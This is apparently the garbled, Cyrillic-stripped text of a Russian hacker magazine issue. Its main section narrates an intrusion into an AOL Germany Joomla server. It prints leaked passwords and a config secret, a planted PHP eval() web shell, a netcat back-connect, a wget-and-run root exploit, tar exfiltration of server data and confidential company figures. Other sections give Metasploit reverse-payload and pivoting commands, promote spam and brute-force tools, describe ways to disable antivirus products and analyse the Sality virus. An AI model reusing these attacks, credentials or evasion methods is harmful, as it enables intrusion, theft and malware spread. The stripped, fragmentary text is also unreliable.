metsvc meterpreter ;
PassiveX ActiveX.
NoNX
DEP;
DNS , , IP;
HTTPS ,
HTTPS- (, ).
PassiveX, .
,
ActiveX,

Meterpreter
IE HTTP-. ,
, - ,
NAT , HTTP- -.
, .
(
) IE.

(192.168.0.102:443):
msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe
msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

, PassiveX IE6,
IE7/8.
. , ,
, meterpreter,
.
.
(192.168.0.101) 5678 .


WMAP . ,
:)


winenum.rb
MSF:
msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

,
meterpreter, . MSF
meterpreter , , (
). . ,
(
), (, 1):
msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions -u 1

.
, meterpretere.
(linux, Macos), - . , -,
: - meterpreter
PHP! -,
PHP, .
.
. MSF
, .
, :).
. MSF,
, 192.168.0.103:5555.
80 netcat:
ncat --sh-exec "ncat 192.168.0.103 5555" -l 80 --keep-open

payload IP ( DNS) .
, netcat SSL, ,
.

,
meterpreter. , meterpreter, -


, ( ,
chroot) ( -, , ,
) :).
,
(192.168.146.129) (192.168.0.102)
-.
(, , )
msfconsole:
msf> route add 192.168.146.0 255.255.255.0 1

, nmap ,
. , ( - )
(. )
MSF.
( ),
, , meterpreter :
meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

payload LHOST=192.168.146.129,
LPORT=8008, -.
Meterpreter -. .
msf3\scripts\meterpreter,
run Tab ( , :).
run, AutoRunScript
InitialAutoRunScript /. , .
, :
winenum ;
persistence, metsvc meterpreter
;
getcountermeasure , .

- ( ,
) , ,
, . ,
, ,
MSF, , , . ,
!


Anonymous

AOL

AOL
AOL
. :
AIM, AOL Mail ICQ, ,
,
aol.com (-50
). , ,
XSpider 7.7 AOL,
64.12.0.0 64.12.255.255. ...
DETECTED

,
, alex-aolde-mtc02.evip.aol.
com, http://
alex.aol.de .
, CMS Joomla
1.5.x.
, OWASP Joomla!
Security/Vulnerability Scanner YGN Ethical Hacker Group
( ).
, , :
C:/Perl/bin/perl5.12.1.exe C:/joomscan/joomscan.pl -u http://alex.aol.de


:
* Deduced version range is : [1.5.12 1.5.14]
...
# 14
Info -> Core: Admin Backend Cross Site Request
Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in
and to be tricked into a specially crafted webpage.
Vulnerable? Yes
...
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon

!
...

var $secret = 'NAAgXewXco6BSw2d';


...
var $host = 'localhost';
var $user = 'alex';
var $db = 'test';

multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/
plugins/tinybrowser/
Exploit: While Joomla! team announced only File
Upload vulnerability, in fact there are many. See:
http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

OWASP

,
, OWASP DirBuster (, , ).
, :
Target URL: http://alex.aol.de/;
Work Method: Auto Switch (HEAD and GET);
Number Of Threads: 200;
Select starting options: Standard start point, Brute
Force Dirs, Brute Force Files;
File extension: php.

, .
: ./info.php (phpinfo), ./pma (phpMyAdmin) ./dnld, (configuration.php, phpMyAdmin-3.3.2-english.tar,
wirwarendrin.tar).
80- wirwarendrin.tar ,
alex.aol.de wirwarendrin.
de, .
, ,
:).


configuration.php,
:
<?php
class JConfig {
...
var $smtpport = '465';
var $smtpuser = 'wirwarendrin';
var $smtppass = 'Briesben';
var $smtphost = 'smtp.aol.com';

...
var $password = 'wjedko,lg';
...
}
?>

wirwarendrin@aol.com, , , alex.aol.de.

phpMyAdmin, :).
alex, , ,
:
.
.


PasswordsPro, , , Joomla! md5($pass.$salt).
, http://forum.
antichat.ru/showthread.php?t=13640 PasswordsPro
d86f4c81342b79c4bab8868656c
abe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb, .
qwertyzuaor, alex.aol.de,
alex.aol.de/administrator.
, , alex.aol.de AOL
,
450 AOL,

:)

AOL INSIDE

:
Extensions Template Manager aol-exit Edit HTML,
/data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/
templates/aol-exit/index.php.
:


Joomla!
<?php
eval(stripslashes($_REQUEST[aaa]));
?>

HTML-:
<form action="http://alex.aol.de/templates/aol-exit/
index.php" method="POST">
<input type="text" name="aaa"/>
<input type="submit" value="Pwn It!"/>
</form>

wget WSO-
(http://forum.antichat.ru/thread103155.html) templates
404.php
(, , ).

/data/servers alex.aol.de: editor.aol.fr, gat.aol.co.uk, sns.nexus.aol.com,


wahl-o-mat.aol.de, matrix.aol.de.
,
,
:
cd /data/servers;tar czvf /tmp/1.tgz ./*

, ,
, , :
Linux wahl-o-mat.aol.de 2.6.9-55.ELsmp #1 SMP Fri Apr
20 17:03:35 EDT 2007 i686

,
Back-connect 31337 WSO ( Network) NetCat:
c:/netcat/nc.exe -l -p 31337

,
http://www.exploit-db.com. , ,
wunderbar emporium (http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz).
, , uid=0(root) gid=0(root) groups=11560(httpd):
wget http://www.grsecurity.net/~spender/wunderbar_
emporium.tgz;tar xzfv wunderbar_emporium.tgz;chmod
0777 ./*;./wunderbar_emporium.sh

-
. ifconfig ,


joomscan.pl
10.62.134.80.
rpm nmap:
rpm -vhU http://nmap.org/dist/nmap-5.21-1.i386.rpm

:
nmap -v -n -sS 10.62.134.0/24


AOL,
:
Nmap scan report for 10.62.134.89
Host is up (0.00013s latency).
Not shown: 986 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
1024/tcp open  kdm
1041/tcp open  unknown
1051/tcp open  optima-vnet
1311/tcp open  rxmon
1801/tcp open  unknown
2099/tcp open  unknown
2103/tcp open  zephyr-clt
2105/tcp open  eklogin
2107/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 00:18:8B:74:52:6E (Dell)
...
Nmap scan report for 10.62.134.96
Host is up (0.00013s latency).
Not shown: 971 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1024/tcp  open  kdm
1025/tcp  open  NFS-or-IIS
1027/tcp  open  IIS
1078/tcp  open  unknown
1112/tcp  open  msql
1311/tcp  open  rxmon
1801/tcp  open  unknown
2099/tcp  open  unknown
2103/tcp  open  zephyr-clt
2105/tcp  open  eklogin
2107/tcp  open  unknown
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-term-serv
9998/tcp  open  unknown
13722/tcp open  netbackup
13782/tcp open  netbackup
13783/tcp open  netbackup
49152/tcp open  unknown
49153/tcp open  unknown
MAC Address: 00:13:72:5A:3E:78 (Dell)

INFO

info

./dnld
backconnect WSO-

, AOL
:).

AOL CONFIDENTIAL


AOL
.
, PasswordsPro alex.aol.de.
, 450 ,
197.

.
:

, :).

: ,
, , , , ebay paypal (!),
.
Company Confidential.
AOL Germany SNAPSHOT SUMMARY as of COB
Date : [2006-02-11]
Business :
AOL
GERMANY (AOL)
FOR [2006-02-11]
-Ending Members 2,687,173
-Registrations 1,824
-Reactivations 146
-Overhead Conversions 1
-Cancellations 1,472
-Terminations 549
-Net Change -50
-Customer Hours 7,301,418
-Total Hours 7,322,081

,
2006-02-11 :).



,


.htaccess

Options
+Indexes.



,

: Order Deny,
Allow
Deny from all

HTTP://WWW
links
http://yehg.net/lab/pr0js/files.php/joomscan.pl Joomla! Security/Vulnerability Scanner
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project OWASP DirBuster Project
http://www.insidepro.com/eng/passwordspro.shtml PasswordsPro
http://www.webhack.ru/download/?
case=info&go=
100 NetCat


, -
.
: ,
phpMyAdmin' ,
,
.
, AOL :).!


icq 884888

X-TOOLS

: RemCam 2
:Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: redsh

:
- ( 180,5 );
- .



? ,
.
,
, RemCam 2,
/-!
:
- -;
- (, );
- RGB,
YUV, JPEG - (BI_RGB, YUY2,
UYVY, NV12, YV12, I420, Y8, MJPG,
);
-
-
;
- JPEG
;
-
( ,
);
- IMA
ADPCM;
-
;
- ZLIB- ;
-

;
- ( md5-
);


,
,
redsh.ru/board.
php?feed=programs&id=20 (

RemCam 2).

: aNYfAKE
: *nix/win
: b00zy_c0d3r and The Mafia

,
.

: PHP, fopen, ,
:).
:
1. , ;
2.
;
3. ;
4. ;
5. ,
.


.
:
Fake host (
http://
www.mail.ru, mail.
ru);
Fake path
( -

http://somesite.
ru/adminka/, /
adminka/,
, /);
Fake script
( http://somesite.ru/adminka/
loginhere.php, loginhere.php);
Redirect ,

;
Log type (mail
file);
Email
, ;
File
.


,
http://forum.xeka.ru/
showthread.php?t=142.

: VK Regger
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: 0pTik

,
.
:

- ( 10
-);
-
;
-
;
- ;
-
antigate;
- ;
- HTTP Proxy, Socks4,
Socks5;
- 98%.

,


,


, .
: http://forum.antichat.
ru/thread219834.html.

, ,
, ( )
Start. ! :)

: ArxFinder
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: ArxWolf

: VkFunAdder 0.3
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: IOFFE


,
?

(
). VkFunAdder
. ,


:
-
mail:password;
- antigate
;
- ;
- ;
- ;
- .

, ,
,
200 .
P.S.
: http://forum.antichat.ru/
threadnav207277-1-10.html.

: ICQ Light Spam


: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: q1w2e3


ICQ-,
- - :)
, ICQ Light Spam
-
ICQ. :

ICQ-
-
;
-
4000;
- ;
- ;
- ;
- ;
-
;
- ;
- .NET Framework 3.5.


,
!

: ASR Brute
: Windows 2000/XP/2003 Server/
Vista/2008 Server/7
: q1w2e3


q1w2e3,
. , ASR Brute (Answer Secret
Rambler Brute)
Rambler.ru (
,
?). :
- ;
- ( 50
10 );
- ;
-
good.txt;
- bad.txt;
-
dict.txt;
- .


dict.txt,


webxakep.net, ArxFinder
. :
- ;
- + ( 1 100);
- ;
- ( 1 );
- (
30000 15-20%);
- ( 30000
14 );
- , ;
- ;
-
;
- ,
;
-
,
(
);
- ;
- ( );
- Windows
7 Ultimate, Windows 7 Maximum,
Windows Vista Windows XP.

,
/
// ,

ArxFinder.
P.S.
http://webxakep.net/forum/showthread.php?t=7693.

MALWARE
deeonis deeonis@gmail.com

Nod32, Avast, Avira:



-
, - .
? ?
? ,
. . ,
:).
-
.
ESET
NOD32 4.2.

, , ,
, ,
- .

,
, HIPS (Host Intrusion Prevention System)
.

avast! Free Antivirus.
, ,


.
, avast!
Intelligent Scanner,
,
( ,
P2P/ ..).
, , ( ) ,
-, Avira AntiVir Personal.
,

, , ,
Backdoor-, , , ..

,
. ,
.
,
Windows.
Windows XP
Professional SP3.

. ,
.
.
-,

NOD32.
.
.
,
.
, .
- ,
.
.

. ,
API-.
,
, ,
. -
, , API- .
,
Windows, . ,
. ,
,
.
, , -
, ,
, .


. ,
.
MoveFileEx; .
NULL, MOVEFILE_DELAY_UNTIL_REBOOT, ,

-, .
, .
, .
NOD32 ,
: egui.exe ekrn.exe. , . -
. ,
.
. , , NOD32
.

Avira
.
avast avastsvc.exe avastui.exe,
Avira AntiVir avgnt.exe, avguard.exe, avshadow.exe. ,
... . ,
. ,
, .
.

- , -
. .
, . ,
. ,
, .
. , , . NOD32
exe. .
avast! Free Antivirus Avira AntiVir Personal, ... ,
. . .


, .
MoveFileEx

      ESET NOD32   avast! Free Antivirus   Avira AntiVir Personal
1     5            5                       5
2     5            5                       5
3     5            5                       5
4     3            3                       3
5     2            5                       4
6     3            5                       3
      3.8          4.7                     4.2


avast!

Avira AntiVir Personal


MOVEFILE_DELAY_UNTIL_REBOOT, . , ,
,
.
NOD. ,
, .
. .
. Windows

, , ,
- . ,
, ,
,
.
.
- ,
.
, .
, , Safe mode ,
.
,
.

, ,


,
, , . , ,
, , 95% . ,
100 , ,
, , ,
( ). ?
, . -
, 1,5k
.
?
, , , HIPS' ,
, . ,
.


XP. Welcome
, ,
NOD32. . , .
, Avira AntiVir.
, .
, , . , avast!,
Avira, .
,
? , - ,
.
.

Windows XP Professional. ... : gpedit.msc. .


User Configuration, Administrative Templates, System.
Don't run specified Windows applications.
,
. NOD32.
: egui.exe ekrn.exe.
, . OK
. , .
, , ... , ,
. ? .
, ekrn.exe - ,
. .
. . , NOD
, ,
, . Avira
AntiVir. . .
, -
.

,
Malware
, , . ,

, . ,
,
. , ( ) ,
, .
.


avast! Antivirus Free


. , .
,
.
. NOD32. NOD
.
, :


msiexec /quiet /uninstall {1A59064A-12A9-469F-99F604BF118DBCFF}

, GUID.
. ,
!
avast! Free Antivirus .
:
C:\Program Files\Alwil Software\Avast5\aswRunDll.exe "C:\Program Files\Alwil Software\Avast5\Setup\setiface.dll" RunSetup.

.
,
(. ).
avast . Avira
AntiVir Personal?

. , ,
- , ? . ,
, .

, .
,
. ,
, . NOD32,
,
. Windows.

,
UI,
.
. ,
: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.
ekrn.exe, ekrn,
.
Del Access denied.
.
UI-. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
, egui.exe.
, .
NOD . ,
. ESET NOD32 .
avast.
, NOD. ,
, . ,
, UI- . . Avira AntiVir ,
NOD32 ,
, ,
. .

. , ,
. avast! Free Antivirus
4,7 . Avira AntiVir Personal 4,2 .
ESET NOD32 3,8 . , . , ,
.

MALWARE
,


FakeAPI

Header

Header

PE Virus.Win32.Sality.aa

-:

SALITY.AA


, Virus.Win32.Sality.aa.

FakeAPI .
. , , x86- , , ModRM,
SIB, ,

, .


.


.
Virus.Win32.Sality
a 2003 ,
, aa
2008 . ,

.
Virus.Win32.Sality.aa

.



. PE-,
, BackDoor.

.
,
, API-.


, , ,
,
, , -,
-.
,
,
0x300-0x400 .
, , , FakeApi
. ,
, PoC
(Proof of Concept) .
EPO (Entry Point Obscuring)
Virus.Win32.Zombie.
. .
Sality ,
, , .
.
,
.
,
.
. ,
, . . , , .
PE- Virus.Win32.Sality.aa
. ,
.
? :

, ,

API
,
.
,
.
,
. , . .
, -
.
API- . -
.
, Sality , .
, .

. , ,
. ,
. .
:
;
VA ;
VA ;
VA.
, , Sality .
PUSHAD CALL. PUSHAD ,
,
, ,
POPAD,
. CALL,
, (VA) . ,
. .
( , ,
, ):
POP REG;
SUB REG, IMM;
MOV REG, [ESP];
ADD REG, IMM;
ADD [ESP], IMM;
POP REG;

REG 32- , IMM


.
() - (,
REG Sality ):
JMP REG;
CALL REG;
PUSH REG;
RETN;

,

.
, .
,
:
Virus.Win32.Sality.aa
.
, , , ,
. , .
.
,
,
, :
(- -
);


.
ModRM;
;
.

2 4 . , ModRM . .
. ,
, , ModRM. , , Mod 3
LEA. ,
x86, Intel, IA-32 Intel Architecture
Software Developers Manual, 2.

X86

, .
, - .


. ? !
. , ,
EAX 0. :
PUSH 0; POP EAX;
XOR EAX, EAX;
MOV EAX, 0;
AND EAX, 0;

,
.
, , ,
. :
PUSHAD; NOP; NOP; NOP; NOP; POPAD; ADD EAX, 0xFFEEFFEE;
INC EAX; OR EAX, EAX; SUB EAX, 0xFFEEFFEF; PUSH EBX; PUSH

0Fh, .
, .
. ,
0B8h MOV eAX, lz, ,
. ,
B8 FF FF FF FF MOV EAX, 0FFFFFFFFh. , , , PUSH EBP 55h, PUSHAD 60h. ,
ModRM.

FakeAPI API,
,


, : Mod, Reg/
Opcode, R/M. Mod , .
3, , . R/M Reg/Opcode .
, , 0x80, 0x81, 0xC1, Reg/Opcode
, .
Mod 3, R/M 4,
SIB. .
, . : ADD EAX, [EAX + ECX*4 + 600].
,
. .
. . :

ECX; POP ECX; POP EBX; LEA EAX, [EAX]; MOV EDX, EDX;


, ,
.


F0 Lock;
F2 REPNE;
F3 REP;
2E CS segment override;
36 SS segment override;
3E DS segment override;
26 ES segment override;
64 FS segment override;
65 GS segment override;
66 Operand Size;
67 Address Size;


Virus.Win32.Sality.aa

Intel , , , .
, ,
. REPNE/REP
,
, SCASB, MOVSD, LODSW.

, .
Sality? -,
, .
PUSH POP. ,
Mod 3,
, . LEA, Mod 2, 3
. -,
, - : SHLD, BSF,
BTS, BTC, XADD . Sality 66h,
REPxx .
, ,
.
, , .
. Sality . Intel
:
Repeat prefixes (F2H, F3H) cause an instruction to
be repeated for each element of a string. Use these
prefixes only with string instructions (MOVS, CMPS,
SCAS, LODS, STOS, INS, and OUTS). Use of repeat
prefixes and/or undefined opcodes with other IA-32 instructions is reserved; such use may cause
unpredictable behavior.

, F2 F3
,
CALL, SHL, TEST
. .

. Sality 64h

x86
CALL. , !
? , , ,
.
,
, .
. , , ,
,
.

FakeAPI.
.
API-, ,
. FindClose GetModuleHandleA.

. -,
EAX ,
, .
-, FindClose
, FindFirstFile.
FindClose (0) ,
. ,
FakeAPI ,
, API-,

.

,
. , Sality
. , ,
. FakeAPI
. , ,
, . ,
, , ,
.


Mifrill mifrill@real.xakep.ru

IT-
Parallels

IT .

,
: ABBYY, Parallels.
,
, , , Parallels,
.

Parallels
. ,

.
, ,
.
( Parallels)

.
,
, , , 20 ,
50 .
,
, ;
:
,


- ().


, 1992
,
.

. , ,
(, , ..).

-
. ,
, .
, ,
,
, . ,
,
,

:
.

, ,
.
1994, -

,
,
.
, Standard
& Western.
Standard & Western
, ,
- .

,
S&W
. ,

S&W

Rolsen. ,
, .
, ,
, .
-
90- , ,
, .

PARALLELS DESKTOP

, Rolsen
Electronics .
. - ,
,
,
16 ERP-.
,


60 S&W
,

Solomon.
S&W ,
, ,
,

:
Parallels 30 55 .
Parallels 500 , , Microsoft, Apple, Intel,
AMD, Dell, HP IBM.
Parallels , , , .
1 . .
Parallels 10 . 125 .
90% 98% Parallels .
Parallels 60%
, 30%, 3%.
Parallels Desktop Mac, , Mac 1
. 2,5 . .

Solomon Software.
,

. ,
,
- , ,

.

.

. ,
,
,
, ,
, . ,
. ,

, , ,
.

, ,
, , ,
.
. Solomon

.
:
,
?.
, Standard & Western
,

. , Solomon
Software , . S&W
,
- ERP- Solomon,
.
,
- ;

Pervasive,
Solomon. Standard
& Western
,
.
(-
)
,
Parallels .
,


PARALLELS
SUMMIT 2009

,
, ,
. , , , ,
, .

CNEWS AWARD
, ,
1975 ,
. 80- ,
, (
4- ) -
, ,
.
,
,
.
, .
, 14
,
. ,

.
. ,
, (),
, ,
.
,
, Siemens,
, .
-,
.
.
, -


,
,
, .
.
,
,
. .
, .
, ,
. :
-
.
Parallels,
( ,
).
,
,
. ,
, ,
. 2000 ,
,
, IBM,
. ,
,
.
,

Parallels ,
, ,
(
15 ). , ,

. , ,
,
700
.


?
,

, ,
,
,
.
, Standard &
Western , 90- ,
. - ,
2000 ,

Solomon Software,
.
, Standard & Western
Software SWsoft.
:
-, Standard & Western
Standard investment, -,
.
,
, ,
dot-com bubble.
, IT- ,

.

, SWsoft , .
,

.

,
,
.

SWsoft. ,
, ,
,
. , , ,
(
,
, , -

, -
,
. , , (
,
, , ,
$300 ), SWsoft
.

, .

, ,
.
,
SWsoft
ASP-.
,
,
,
SWsoft.

,
Acronis
). ?..
, ,
. ,
.
,
Microsoft ,
. ,

, , , Linux ASP
(Application Service Providers). ,
,
, - . ,
, , ,
,
ASP
(Application service providers).
SaaS software as a service
.

VMware.


. ,


, - .
,
, SWsoft .
,

( Parallels Virtuozzo Containers),


Acronis. ,

IT.


- ,
. , ,
- ...
, ,
SWsoft, . ,
. - Virtuozzo Containers,


,
.
-,
:).

,
, -

. , ,
, SWsoft

( ,
, , ,
). ,

.

, Parallels
.
( ) ,
, ,
- . ,
-
,
, Parallels (
), , . ,
, ,

.
,
. ,
,
, ,
.
, . 2003 .
2004 ,
,
. ,

...
, , . ,
, - , ,
SWsoft Parallels .

SWsoft .

Unix, SWsoft,
Parallels -
R&D .

Parallels .

,
, Parallels .
,
Parallels


SWsoft,

. .
Parallels SWsoft,
.
,

? , , ,
.

.
,
,

,
. ,

Parallels . ,

, , :).
,
. 2005 -
Windows, 2006,
,
Parallels Desktop Mac.
, , 2006 ,
Apple Intel,
.
.
,
, . -


Parallels Desktop Mac


3,5 .
, Apple
BootCamp,
Windows,
Mac OS. , .

- ,
Mac OS,
. ,

Parallels - -
,
.
( ,
)
Parallels .
2005 ,
SWsoft,

: Bessemer
Venture Partners, Insight Venture Partners
Intel Capital.

, , - .
2003 SWsoft
Plesk Inc.
, , , . Plesk
,

( Parallels Plesk Panel).

Parallels

Virtuozzo Containers, Parallels Workstation,


Parallels Server Mac,
Parallels Desktop
Mac. 2008 Parallels SWsoft,

. -

, ,

.
Parallels , ,
.
,
, . Parallels
,
, - ,
.
- Parallels
,
Parallels ,
.
, Parallels

,
. ? Parallels
, ,
,
,
,
. Parallels
,
.
Parallels
. z

PARALLELS

. ,
iPhone Mac. . ,
, . - , , ..
.
-
,
VMware ?
. .

. , ,
. , ,
, BIOS. , .
, . ,
Intel Pentium
.

,
,
.

Parallels Desktop for Mac for Windows Linux ,


, ?
.
,
. ,
. ,
, .
, , :
( - )?
, .
. . , -
. ,

, , , . /
, ?
, ,
, - .
. ,
- - .
, ,
. ,
,
. .
- ,
. , - , .
, SmartSelect,
Word-
Windows.
, , Word, ,
,
. . ,
SmartSelect,
SharedFolders, SharedProfiles Coherence. , , -
,
.


UNIXOID
Adept adeptg@gmail.com

Linux,
,
Linux
.
.
.

()
, kernel.org, .
2.4.x
( )
( :) )
2.6.x.
-rc, git' rc-git.
7-9 rc-,
. , 4-5 ,
2.6.35.

LINUX-RT
, .
Linux
.
,


. , ,

-
.

highload-. ,
, .
www.kernel.org/pub/linux/kernel/projects/rt/.
2.6.33.6-rt27.
realtime-
. , Ubuntu rt-

Processor type and features


Preemption Mode (Complete Preemption
(Real-Time)). Kernel hacking Check for stack
overflows, .
, : Kernel hacking
Tracers > Kernel Function Tracer, Interrupts-off
Latency Tracer, Interrupts-off Latency Histogram,
Preemption-off Latency Tracer, Preemption-off
Latency Histogram, Scheduling Latency Tracer,
Scheduling Latency Histogram, Missed timer
offsets histogram.
PREEMPT RT, :

$ sudo apt-get install linux-rt


.
-

$ uname -v
#1 SMP PREEMPT RT Wed Aug 4 00:40:34 YEKST 2010


HTTP://WWW
links

grsecurity
reiser4, reiser4progs.
:

:)

,
:
# echo 1 >/sys/kernel/debug/tracing/latency_hist/enable/wakeup

:
$ grep -v " 0$" /sys/kernel/debug/tracing/latency_hist/wakeup/CPU0

: ,
.

BFS
-
(, ) Linux. BFS
(Brain Fuck Scheduler), CFS , , ( ,
BFS
, , , ,
, , ,
). :
www.kernel.org/pub/linux/kernel/people/ck/patches/2.6.
( 2.6.34-ck1) General Setup BFS cpu scheduler.

REISERFS
,
. , ,
. Reiser4 .
(reiser4-for-2.6.34.patch.gz)
: ftp://ftp.kernel.org/pub/linux/kernel/people/edward/reiser4/reiser4-for-2.6.
File Systems Reiser4.
.

kernelnewbies.org
lkml.org

Linux Kernel Mailing
List
liquorix.net
Debian-
,

zen-kernel
grsecurity.net
ccache.samba.org
zen-kernel.org
ksplice.com

$ sudo apt-get install reiser4progs

, :
mkfs.reiser4 reiser4;
fsck.reiser4 reiser4;
measurefs.reiser4
reiser4.

GRSECURITY
,
Linux-.
grsecurity Security options
Grsecurity. : ,
. ,
-
. :
FIFO
( FIFO),
;
* dmesg , root,
;
chroot

chroot.
:
, chroot: mknod (
,
), chroot, sysctl
;
/proc ,
( wheel);
/dev/kmem, /dev/mem /dev/port;
;
( fork(),
, SIGSEGV ).
,
:
/proc /proc
. GID ,
/proc.
chroot: suid,

INFO

info
fakeroot


.

,
sudo.
BFS

Android.
hackbench
(developer.osdl.org/craiger/hackbench/src/hackbench.c)

BFS.




.
Kernel Check
(kcheck.sf.net)
python'
,


deb ,
.


ksplice.com. rebootless

nconfig menuconfig

,
, ;
( mount/
umount);
;
( root
).
Security Level
. Custom,
. , Grsecurity Sysctl
support, /
sysctl .
,
.
/
RBAC (Role Based Access Control)
.

gradm2, :

!
, production-,
24x7. ,
security-update , .
downtime . .
. :
, , ksplice.com .

uptrack.
# uptrack-upgrade
! , uname -a .
# uptrack-show
.
-, ,
e-mail . rebootless
, , $3,95 ( 20, $2,95).
30 . .
, ,
.


$ sudo apt-get install gradm2

ZEN-KERNEL
Zen-kernel ,
. . zenkernel :
( 2.6.34-zen1);
git';
.
: zen-stable.git ( ,
) zen.git ( git-
).
:
( BFS);
Reiser4;
Linux-PHC , CPU
;
( Lenovo ThinkPad SL,
Gamecube/Wii, Macbook, WiFi- );
Tuxonice , hibernate (
,
);
FatELF ,
( Universal Binary Mac OS X);
DazukoFS , on access
. .


, , .
Ubuntu, .
( ),

:
$ sudo apt-get install linux-source

zen-kernel , generic-
ubuntu, . ,
:
$ sudo apt-get install build-essential libncurses5-dev \
libgtk2.0-dev libglade2-dev libqt3-mt-dev git-core

src,
/usr/src:

reiser4
$ sudo usermod -a -G src adept

git- ( 500 ):
$ cd /usr/src
$ git clone git://zen-kernel.org/kernel/zen-stable.git linux-2.6-zen

, :
$ git tag # ,

:
$ git checkout v2.6.34-zen1

git.
, . :
$ cd /usr/src/linux-2.6.34
$ bzcat ../patch-2.6.35.bz2 | patch -p1

patch '--dry-run',

, , .
:
make config , .
( );
make allnoconfig/allyesconfig ,
no/yes;
make defconfig ;
make randconfig ;
make oldconfig .
, ;
make menuconfig , ncurses,
;
make nconfig 2.6.35. , ncurses, ,
, menuconfig;
make xconfig QT;
make gconfig GTK.
menuconfig.
-

. :
, ( ,
/) , . , . ,
, , .


EXPERIMENTAL . Device
Drivers Staging Drivers.
.
,
General Setup Local Version.
. , ( .config),
:
$ make

-j , .
,
. :
$ sudo make modules_install
$ sudo make install

/lib/modules/,
/boot. initrd :

-
-
- . , , .
ccache, .
.
ccache
$ make CC="ccache gcc" CXX="ccache g++"
~/.ccache,

$ ccache -s


$ sudo update-initramfs -k v2.6.34-zen1 -c

grub, :
$ sudo update-grub

, , , .

. DEBIAN-WAY
, . ,
,
,
.
Debian/Ubuntu make-kpkg. ,
make-kpkg, :
$ sudo apt-get install kernel-package

, ,
:
$ fakeroot make-kpkg --initrd --revision=mykernel \
kernel_image kernel_headers modules_image

, : linux-image-version-revision.deb ( ) linux-headers-version-revision.deb ( ), /usr/src. , , :
$ sudo dpkg -i /usr/src/*.deb
$ sudo reboot

MAKE COMPLETE
, ,
.
OpenVZ Xen, Openwall, ( ).z

UNIXOID
zobni n@gmail.com

100

Linux-

UNIX- .
, ,

,
. ,

? ,
.

,
.
, ,
:
1. -.
. , ,
, ,
.
, ,
.
2. , -
.

( ).

.
3. , ,


,
, ,
, ,
.

.
4. , (, , )
,

,

DDoS.
.
5.
DOS-,
,

, ( , , ),

.


( )
.
,
,

, - 0,1%.

!
. ,
. -,
,
. :
( <Ctrl+Alt+L>).
-, ,
qwerty 123.
:
( , ,


INFO).
GRUB ,
. : GRUB
( ). , GRUB ,
BIOS,
CD-ROM LiveCD,
.
:
BIOS. :
CMOS
,
. : .
,
. :

.
, , ,
:
. , ,
.
,
CD-,
USB- /.
<Ctrl+Alt+Del>
. ,
/etc/inittab,
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
/sbin/init q.


, ,
.
,

.
- , ,

(. ][ 06.2010). , .
: ,
.
,
DoS/DDoS.
, , , , ,
(][ 09.2009).

Tiger

,
.
, Ubuntu, Fedora, OpenSuSE,
,

. , :
,
, . Ubuntu
(System Administration Software Sources
Updates Automatic updates, Install security updates
without confirmation)
/etc/apt/apt.conf.d/10periodic:
$ sudo vi /etc/apt/apt.conf.d/10periodic
APT::Periodic::Enable "1";
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "1";
APT::Periodic::AutocleanInterval "5";
APT::Periodic::Unattended-Upgrade "1";

, ,
.

, SELinux AppArmor ( Ubuntu, OpenSuSE Fedora),
,
(
Linux,
][).

INFO

info

,

APG,

,

.
suid/
sgid-

:
$ find / -type f \( -perm -004000 -o -perm -002000 \) -links +1 -ls


Tiger

SUID- Linux



( UNIX -
,
), ,
root. ,
,
. , root, .
1. su
, root ,
. ,
/etc/pam.d/su auth required pam_wheel.so
auth sufficient pam_rootok.so. su
, wheel (,
).
2. root ,
,

GRUB
GRUB :
1. /sbin/grub
md5crypt.
md5-.
2. /boot/grub/grub.conf
password --md5 -.

Tiger
Tiger , shell-,
, UNIX-.
, ,
. chkrootkit John the
ripper.

Zeppoo
Zeppoo Linux ,
, ,
/dev/kmem /dev/mem. : http://sourceforge.net/projects/zeppoo.


root' .
,
: /tmp
(,
- FTP-). ,

noexec ( nosuid,nodev). :
/dev/sda5 /tmp ext2 nosuid,noexec,nodev 0 0


.
:
$ /lib/ld-linux.so.2 /tmp/exploit

, Linux
, RSBAC (www.rsbac.org),
.
3. -
,
: , SUID-.
root-.
( , ), SUID- . ,
, SUID- .
SUID- find:
$ sudo find / -type f \( -perm -04000 -o \
-perm -02000 \) -exec ls {} \;


root:
$ sudo chmod a-s ///

,
. , man .
4. .
-
,
- (,


rkhunter
, ,
). , :
# find /dir -xdev -type d \( -perm -0002 -a \
! -perm -1000 \) -print

5. ,

. , , , FTP-,
-.

( ).
, , ..
. . ,
, ( 022),
- , (
, ).
,
~/.profile:
umask 077


.
, -
, (OpenSSH, ), ,
